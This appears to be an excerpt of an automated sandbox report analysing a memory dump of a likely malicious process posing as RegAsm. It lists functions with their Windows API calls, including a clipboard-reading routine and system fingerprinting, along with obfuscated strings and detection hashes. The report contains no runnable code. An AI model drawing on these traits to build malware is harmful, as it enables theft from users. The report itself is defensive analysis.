String ID: CIBH$_lnu
API String ID: 3960555810-984119573
Opcode ID: 9d973da7cb8a114e66c5f25e3a949c8ba8e3822dc219e349e17634a29b3130b6
Instruction ID: a2bb3684557162ee2f49806f260b602f9b7871237fe13f1eab2b60d67e6459de
Opcode Fuzzy Hash: 9d973da7cb8a114e66c5f25e3a949c8ba8e3822dc219e349e17634a29b3130b6
Instruction Fuzzy Hash: 89A1B170608B918FD725CF3A94607A7FBE1AF52304F5888AEC0DB8B792C779A405CB55

Function 00427D4F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00427E2C

Strings

_lnu, xrefs: 00427D61
CIBH, xrefs: 00427F86

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: CIBH$_lnu
API String ID: 3960555810-984119573
Opcode ID: ea4bbfb4eb7fe34811cc17a5cbaef481ecb2303c0045911029fb0a7c8fae4abf
Instruction ID: 3e513490e3630ff00b8492a31ce46514cb33d6c8190ff517c07bcdcbd49a14c7
Opcode Fuzzy Hash: ea4bbfb4eb7fe34811cc17a5cbaef481ecb2303c0045911029fb0a7c8fae4abf
Instruction Fuzzy Hash: 33A1C270608B918EE725CF3A94607A3BBE1AF52304F5889AEC0DB8B792C7796405CB55

Function 0042E923 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042E96E
GetSystemMetrics.USER32 ref: 0042E97D

Strings

, xrefs: 0042EA51

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 9d417bebad8767355f5a3150051b72f88514b915f49f7c877b5b5b127bdc4e16
Instruction ID: 7ffaf50f013e515cdccb5d18165b5c57dc22c2f3b4628cb64ea43bf992c5b7ec
Opcode Fuzzy Hash: 9d417bebad8767355f5a3150051b72f88514b915f49f7c877b5b5b127bdc4e16
Instruction Fuzzy Hash: AD5191B0E152199FDB40EFADE985A9DBBF0BF48300F108529E898E7354D734A945CF86

Function 00421640 Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

!65", xrefs: 00421A03
;>3, xrefs: 00421A0B
%*+(, xrefs: 00421665

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: !65"$%*+($;>3
API String ID: 2994545307-1343997536
Opcode ID: 3461a0fd59c564cd22dcc78a87597d0a57dfc51654cee219b174401dfeb5d1c5
Instruction ID: 9c8accba8b92abf18e1594b76db8a62947509ae7321b67fd8142dc787c231cfb
Opcode Fuzzy Hash: 3461a0fd59c564cd22dcc78a87597d0a57dfc51654cee219b174401dfeb5d1c5
Instruction Fuzzy Hash: 26C17C71B083604BD714DF2498817AF7792EFE1744F99852EE8854B3A2E778DD06C38A

Function 0040AE60 Relevance: 4.1, Strings: 3, Instructions: 373COMMON

Download Yara Rule

Strings

'", xrefs: 0040B19F
:,":, xrefs: 0040B1A7
. /&, xrefs: 0040B1C0

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: '"$. /&$:,":
API String ID: 0-2114766974
Opcode ID: e24e6c48d4e77705d9c09bfe272564e535c5c4cf195ad53baea96fd9ddb3e0df
Instruction ID: 4fe767104c4f3db500b5cf8a4ede20fd35f8d5db63cce934ca3192c17b7f1f3c
Opcode Fuzzy Hash: e24e6c48d4e77705d9c09bfe272564e535c5c4cf195ad53baea96fd9ddb3e0df
Instruction Fuzzy Hash: 23C1137110C3958BC314CF25C89466BBBE2EFC2344F198D6DE8D56B391D7798809CB8A

Function 0040B320 Relevance: 2.9, Strings: 2, Instructions: 444COMMON

Download Yara Rule

Strings

sq, xrefs: 0040B4A5
:, xrefs: 0040B5EF

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: :$sq
API String ID: 0-4203955133
Opcode ID: 4fe4355c2d7675bdd0673cfda56034ac6e61dc8d580f8c335f8c9cf19b7f850c
Instruction ID: aee60ef50b283315c28260fc85a81de8ca57b1d128fcb2a4f852c92e4046da37
Opcode Fuzzy Hash: 4fe4355c2d7675bdd0673cfda56034ac6e61dc8d580f8c335f8c9cf19b7f850c
Instruction Fuzzy Hash: E10277B5200B01CFD3248F25D895B97BBF5FB86314F148A2DE5AA8BAA0C774A409CF55

Function 00437D21 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00437D83

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: b39055798cd0f4dd82357cf694a7b56a7edcfa3dc3ed6c79585fcfbb05c9314c
Instruction ID: 2e9015d5033efce51b99a9987a2fe2c503fc9c13cfbaace310aff2b4b3296eaa
Opcode Fuzzy Hash: b39055798cd0f4dd82357cf694a7b56a7edcfa3dc3ed6c79585fcfbb05c9314c
Instruction Fuzzy Hash: 2B01D67AFA19014BEB188F34DC532A977E3E78B325B0CD53D8482D3348DA3CD9064A48

Function 00437A80 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043B73E,005C003F,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00437AAE

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0043B760 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

@, xrefs: 0043B81A

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 3d42915a4dfae0f753c9c9d614c782830973cb44b7d1789a473bb08205a6188b
Instruction ID: 5b656c7e600990c8c83f768d2da58a1eb6ab942e3e9d05d3ed4572ba124aa09c
Opcode Fuzzy Hash: 3d42915a4dfae0f753c9c9d614c782830973cb44b7d1789a473bb08205a6188b
Instruction Fuzzy Hash: EA4146729043108BD724DF14CC8572BB6E6EFC9318F09952DEAD51B391E339890487DA

Function 0043B930 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

@, xrefs: 0043B9E6

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: c30d9002fcd7dc514339f88b301c023e088891e0e819aace388c0c87a3895ac5
Instruction ID: 2b5396a7cbcf584dc174ba11a42e13b8c484934c3b2a017d16c758edba6c8df6
Opcode Fuzzy Hash: c30d9002fcd7dc514339f88b301c023e088891e0e819aace388c0c87a3895ac5
Instruction Fuzzy Hash: EF4125719087108BD724DF28C88176BB7E1EF99328F08862DE9D9573A1E779890487DA

Function 00410214 Relevance: .8, Instructions: 769COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c7cad57483e0332867fef996e189ed12e4fb39621eca5e29d299d9477f7b19
Instruction ID: 1d45cd49c8fd05aeaaeddb1140c5e56ebab1f828ef4a3c98ecddc196c1e48fc2
Opcode Fuzzy Hash: 58c7cad57483e0332867fef996e189ed12e4fb39621eca5e29d299d9477f7b19
Instruction Fuzzy Hash: EB520BB1A04B404FD724EF38C8853ABBBD1AB55314F484A3ED4EBC73C2E679A5858746

Function 0041ADF0 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66122e028bd0d37e5364923e59be28aac916e3790a983520295c21d4122b3dc6
Instruction ID: c4179955eb3b506ecad94725d86d37572460f2be58fe071ec033914c990a4e49
Opcode Fuzzy Hash: 66122e028bd0d37e5364923e59be28aac916e3790a983520295c21d4122b3dc6
Instruction Fuzzy Hash: 3A6269B1408BC28ED3318B3C88457D6BFD5AB6A324F188A5ED0FA873D2D7B46145C766

Function 004180C0 Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4936ffb1482f26b18cd8ef871f4b006edd52530ba18624d8a0e96486f28874f8
Instruction ID: 41df2ee1f34f8923036c5875556315f416446aa4bda329096742cdb3a874c781
Opcode Fuzzy Hash: 4936ffb1482f26b18cd8ef871f4b006edd52530ba18624d8a0e96486f28874f8
Instruction Fuzzy Hash: 8E02CBB24093419BC7108F25D9516ABBBF2FFD1314F18892DE4DA4B351EB78CA45CB8A

Function 0043CB60 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4723740ff2a669596a5d20837f2203e1f3b6997d03ccaa3fb7df26661f2ebbe
Instruction ID: 8021b61b91686c684e5153a0de6d9c5086378017e9a8915c9d08a5aa9ac3a45b
Opcode Fuzzy Hash: e4723740ff2a669596a5d20837f2203e1f3b6997d03ccaa3fb7df26661f2ebbe
Instruction Fuzzy Hash: 7C91F3316083418BD728CF29D89263FBBE2EBD9314F19993EE89697391D739DC018746

Function 0043C0F0 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 44a8b40da777ccc37ffb2cefeaac9c54870d896984330e367bddfcfb06bf370b
Instruction ID: af3b18ce9d5032665110f7bbc2be4a0e577e34248e010fd082cb7a8c57931f38
Opcode Fuzzy Hash: 44a8b40da777ccc37ffb2cefeaac9c54870d896984330e367bddfcfb06bf370b
Instruction Fuzzy Hash: BA9128316043019BCB28DF28C89163FB7E2EFD9714F19D52EE98697361EB389C119786

Function 0043BBF0 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b3de84cc018863acc0d7cdbe36cfe748e5a9e48987eb265f65e1ddc9bc43305
Instruction ID: ddd76e43878e230a35199c21c5d20057d81198ffaeea4075007cb5b9b46d9dd3
Opcode Fuzzy Hash: 3b3de84cc018863acc0d7cdbe36cfe748e5a9e48987eb265f65e1ddc9bc43305
Instruction Fuzzy Hash: 45418B357083005FD3249E68DC91B7BB79BEBC9318F29953EE6C68B391D77998014385

Function 004351B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 00435252

Strings

bRC, xrefs: 00435258

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID: bRC
API String ID: 3298025750-3544902048
Opcode ID: 08d17a398102781c03aacd3aa78600df362062cc0b741c443dfec48e707bd405
Instruction ID: c268e68b7134aea23e7bfd40d8636994f0a5dc38bd204ec34a6b5cf25400e4bd
Opcode Fuzzy Hash: 08d17a398102781c03aacd3aa78600df362062cc0b741c443dfec48e707bd405
Instruction Fuzzy Hash: 681108B9785240CFD3048FA5EC90A6BB7B6E7DA322F14447DDA4983610C6355C12D650

Function 0040E4E3 Relevance: 3.1, APIs: 2, Instructions: 109COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040E4E7
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E61D

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2636d8d4b95666fd28c3f86daa6243eb8d498ee62dd179821ce87972863d18cd
Instruction ID: 3b84b6ba5a26950dd3cc778368940fc9b203b43f63e3f5f6cbf9273a436a48c3
Opcode Fuzzy Hash: 2636d8d4b95666fd28c3f86daa6243eb8d498ee62dd179821ce87972863d18cd
Instruction Fuzzy Hash: EE4119B4D10B40AFD370AF39DA0B7167EB4AB06210F40472DF9F69A6D4E634A4198BD7

Function 004379E0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,00000000), ref: 00437A53

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4a9a3344529e290cb0fc8b27f84cd4566024da22360704b1f38b620ed1727304
Instruction ID: 60750590879d8edde0dcc5f378c58808f1bbc292999bbc851ec8f910618dddf9
Opcode Fuzzy Hash: 4a9a3344529e290cb0fc8b27f84cd4566024da22360704b1f38b620ed1727304
Instruction Fuzzy Hash: 930147B4909241CBD714AF30ECA162B77A5EF8A315F14413CE8C146250D7399815DA96

Function 00429C60 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00429CAE

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 4028d8438d01add2bbd125368f4a99e458155ecc1713dd12b6cb27ea5b703e13
Instruction ID: 35a5a9ef0586cb0596a52e0b89474d27adacd76d4834389a5504c46cf8311865
Opcode Fuzzy Hash: 4028d8438d01add2bbd125368f4a99e458155ecc1713dd12b6cb27ea5b703e13
Instruction Fuzzy Hash: 8FF092B46097028FE310DF25D5E875BBBF1BB89304F10892CE1944B395C7B5AA49CF82

Function 0042CD1D Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042CD67

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: b0116282326a86677bb34cd14543b4e69797e90f4af7736c0739cd63051e0e8c
Instruction ID: 903258602f49e14f6adfd34400e3e56730b9861d4db669cf82a1e18b85cc5156
Opcode Fuzzy Hash: b0116282326a86677bb34cd14543b4e69797e90f4af7736c0739cd63051e0e8c
Instruction Fuzzy Hash: B5F0B7711087038FE311CF25D59879BBBE6BB84308F25C92CE4A44B294D7B9A6498FC2

Function 0040D8D5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D8E7

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 8f34514818a4dbd99378cf47e32d4ddb67e5e2e56ea6af76f9454fceffc9b2ee
Instruction ID: 5538293110484e02ebb1b96dcd16c8d7df887035cdfba819c7f89892cf113db7
Opcode Fuzzy Hash: 8f34514818a4dbd99378cf47e32d4ddb67e5e2e56ea6af76f9454fceffc9b2ee
Instruction Fuzzy Hash: 67D0C9383C43417BF2A48718EC17F543290A706F65F300628F362FE2E0C9E07551861C

Function 00435189 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043518F

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ad9e2aec20d7d2099f3eda949cfc04a9cce4472c31d53c2a3a324f60df134ed8
Instruction ID: 4ce0c7cee30605b9a90a0e6282b988994a68904df8fa599fe345d065fab03941
Opcode Fuzzy Hash: ad9e2aec20d7d2099f3eda949cfc04a9cce4472c31d53c2a3a324f60df134ed8
Instruction Fuzzy Hash: 39B012B8145300EFD6084F10EC04F35372DFB4E712F300028E809451F2C7219C42EE08

Non-executed Functions

Function 0042DFD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 127clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0042DFE0
GetWindowLongW.USER32 ref: 0042E00F
GetClipboardData.USER32 ref: 0042E01F
GlobalLock.KERNEL32 ref: 0042E038
GlobalUnlock.KERNEL32 ref: 0042E15C
CloseClipboard.USER32 ref: 0042E167

Strings

,, xrefs: 0042E0C6
!, xrefs: 0042E099
", xrefs: 0042E0A3
", xrefs: 0042E0BC
!, xrefs: 0042E0C1
', xrefs: 0042E0AD

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: !$!$"$"$'$,
API String ID: 2832541153-753487525
Opcode ID: 0f2531d53cc6569e23132117242616628327beefc03623687c4d1d6e7166fefe
Instruction ID: ea39970e521076c57d1830cdc12096e735ed4f875d45d8c7604cb3eadc15c296
Opcode Fuzzy Hash: 0f2531d53cc6569e23132117242616628327beefc03623687c4d1d6e7166fefe
Instruction Fuzzy Hash: 1241B07160C7A1CFD300AF79A84836FBFD0AB92314F444A3EE4D5863C2D678854A879B

Function 00409590 Relevance: 16.7, Strings: 13, Instructions: 428COMMON

Download Yara Rule

Strings

*+%/, xrefs: 004096B5
D@2B, xrefs: 004096E5
1jhe, xrefs: 00409613
+?58, xrefs: 004096CD
UT, xrefs: 0040976E
1jhe, xrefs: 004099A3
~up, xrefs: 004095E0
$, xrefs: 0040992C
~, xrefs: 00409775
(`v., xrefs: 004096BD
%'' , xrefs: 004096C5
jC, xrefs: 0040971D
=51r, xrefs: 004096DD

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $$%'' $(`v.$*+%/$+?58$1jhe$1jhe$=51r$D@2B$UT$jC$~$~up
API String ID: 0-2966609730
Opcode ID: 974bcfaac64501dcc23cd694accc03719d332cf1bac7499fbeea4e48c36db7e5
Instruction ID: 8913ae64c24272e4b78cdd61b5ea422752c9af8fa353da5ef93a4d2acc2eb27e
Opcode Fuzzy Hash: 974bcfaac64501dcc23cd694accc03719d332cf1bac7499fbeea4e48c36db7e5
Instruction Fuzzy Hash: 23C1E3712083918BD7158F29C45036BBFE1AFD7344F1889AEE4C59B383D679C846CBA6

Function 00424166 Relevance: 10.4, Strings: 8, Instructions: 386COMMON

Download Yara Rule

Strings

at, xrefs: 004241E1
v|v{, xrefs: 004241D1
GBUP, xrefs: 004241FA
NDNC, xrefs: 004241C1
VDB, xrefs: 00424534
GBUP, xrefs: 004240E1
mmeh, xrefs: 004241D9
2EB, xrefs: 00424527

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 2EB$GBUP$GBUP$NDNC$VDB$at$mmeh$v|v{
API String ID: 0-1293991445
Opcode ID: a2d765671aae58ea82ad982161eaa156ba4ccde77dc4bafcfee3942f5f4ba502
Instruction ID: 6d9d23eaf7c9b8f60bd5eb59f014fbe221409bbc4922422c1e7f48475a28a3c2
Opcode Fuzzy Hash: a2d765671aae58ea82ad982161eaa156ba4ccde77dc4bafcfee3942f5f4ba502
Instruction Fuzzy Hash: BFC11EB1508361CFC3108F28E85166BBBF1EF92308F44892EF5D58B3A1D7798945CB5A

Function 0041DDFF Relevance: 9.5, Strings: 7, Instructions: 713COMMON

Download Yara Rule

Strings

BA, xrefs: 0041E230
]YZT, xrefs: 0041DF17
2A, xrefs: 0041E325
^YKK, xrefs: 0041DF1F
ejkh, xrefs: 0041E3C7
InA>, xrefs: 0041DE90
ejkh, xrefs: 0041DE6B

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 2A$BA$InA>$]YZT$^YKK$ejkh$ejkh
API String ID: 0-2501440178
Opcode ID: 387fe459d5cac185aeacdf7c411e5dd9b18c0804bc7325cc3e0806bf6ca8ba28
Instruction ID: a47b4ad9bf7744206d3a7f254c9e1dcd249f058c7ad3c76417d74244c9276c4a
Opcode Fuzzy Hash: 387fe459d5cac185aeacdf7c411e5dd9b18c0804bc7325cc3e0806bf6ca8ba28
Instruction Fuzzy Hash: 2932EE75A18201CFD718CF28DC9062BB7E2FF8A304F49897CE98297395EB799941CB45

Function 00421AD0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

Strings

H*B, xrefs: 00422A42
Kq, xrefs: 00422599
dc, xrefs: 004227F1
dM, xrefs: 00422591

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: H*B$Kq$dc$dM
API String ID: 0-3225756899
Opcode ID: 4d5afb085f1de1cdcb1a39160c87c27283914ec5fe4bd3a4b3e4afb93d4d81b9
Instruction ID: ceb2c949ce499c274e220a850f559ada6a87e4ecb18960b7d0d3933cd50f6906
Opcode Fuzzy Hash: 4d5afb085f1de1cdcb1a39160c87c27283914ec5fe4bd3a4b3e4afb93d4d81b9
Instruction Fuzzy Hash: E3D1FDB59083508BD3249F20D98171BBBE1FF86308F448A6DF4C59B391D7B98906CB8B

Function 004154F6 Relevance: 6.9, Strings: 5, Instructions: 654COMMON

Download Yara Rule

Strings

+_-], xrefs: 00415613
"[:Y, xrefs: 0041570C
SQ, xrefs: 0041561B
WU, xrefs: 00415623
ejkh, xrefs: 00415928

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "[:Y$+_-]$ejkh$SQ$WU
API String ID: 0-2082499474
Opcode ID: a01dc65a79e1fc0a3796b4adfbeb9cacd2f592b98b9a6e38fac2d9fe72f9864c
Instruction ID: fd86044e426286e8d8ebb30a7dc7b42619d3dd126de2e8ae1a07989d5bf6efea
Opcode Fuzzy Hash: a01dc65a79e1fc0a3796b4adfbeb9cacd2f592b98b9a6e38fac2d9fe72f9864c
Instruction Fuzzy Hash: 9B221176609310CBD324CF14C8917EBBBE2EFC5714F19892DE4865B3A5DB798841CB86

Function 00416367 Relevance: 6.7, Strings: 5, Instructions: 436COMMON

Download Yara Rule

Strings

PW, xrefs: 00416544
fA, xrefs: 004166E9
x, xrefs: 00416706
wu, xrefs: 004164EC
X\, xrefs: 004165A2

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: PW$X\$x$fA$wu
API String ID: 0-3536566836
Opcode ID: 3872f72b89aaba8d6f8e3bf68b9b1a64bf4710b72312887deaa8c804bae6492b
Instruction ID: 42ac8be07dc4e80f5121cd989de2eab78f71d611ebd432e545343cbc95fd4df9
Opcode Fuzzy Hash: 3872f72b89aaba8d6f8e3bf68b9b1a64bf4710b72312887deaa8c804bae6492b
Instruction Fuzzy Hash: 41E1A1B55093408BD3348F24C8917ABB7F1FF91314F09892DE8D99B391E7788985CB96

Function 00414CDC Relevance: 6.6, Strings: 5, Instructions: 361COMMON

Download Yara Rule

Strings

2, xrefs: 00414FC1
gfff, xrefs: 00414D91
9, xrefs: 00414FFF
gfff, xrefs: 00414FEE
ejkh, xrefs: 00414EC6

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: 2$9$ejkh$gfff$gfff
API String ID: 2994545307-4198051223
Opcode ID: 79b57fb225a2dfef1258851d9fd4bc572659ae3b9c8c04ff5f109cee309ad3ef
Instruction ID: 0df043c23fe6d8bb08545f16a9bd9a3e9aaca608c94804bc1987791e5041165a
Opcode Fuzzy Hash: 79b57fb225a2dfef1258851d9fd4bc572659ae3b9c8c04ff5f109cee309ad3ef
Instruction Fuzzy Hash: C6B17A76A142104BE728CF29DC517BB77D6ABC5314F18863EE486CB3D5EB3C98428785

Function 00422885 Relevance: 6.6, Strings: 5, Instructions: 320COMMON

Download Yara Rule

Strings

w/B, xrefs: 00422F71
{,B, xrefs: 00422C75, 004230A7, 0042314E
PP, xrefs: 00422B17
C/B, xrefs: 00422F3D
%*+(, xrefs: 00422FA5

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

